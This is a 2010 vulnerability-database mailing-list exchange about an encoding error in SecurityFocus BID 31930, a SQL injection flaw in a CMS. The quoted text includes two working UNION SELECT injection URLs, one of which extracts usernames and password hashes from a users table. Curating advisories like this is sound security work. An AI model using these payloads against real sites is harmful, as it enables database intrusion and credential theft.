[VIM] BID 31930 exploit
George A. Theall
theall at tenable.com
Thu Nov 18 19:46:31 CST 2010
On Nov 18, 2010, at 5:10 AM, security curmudgeon wrote:
>
> http://www.securityfocus.com/bid/31930/exploit
>
> http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION
> %20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),
> 0,0,0,0,0,0,0,0,0%20FROM%20default_users
>
> http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION
> ALL SELECT 0,0,0,0,0,version()--
>
> --
>
> Just want to confirm, it appears the "&" is actually some HTML
> decoding snafu that is essentially doing & and an encoded &? seems
> like that should be "&nid=" in the first example and "&cpage" in the
> second?
Seems to be in error in the BID -- look at the advisory on Packet
Storm and SecurityReason:
http://packetstormsecurity.org/files/view/71280/tandiscms-sql.txt
http://securityreason.com/exploitalert/5013
George
--
theall at tenablesecurity.com
More information about the VIM
mailing list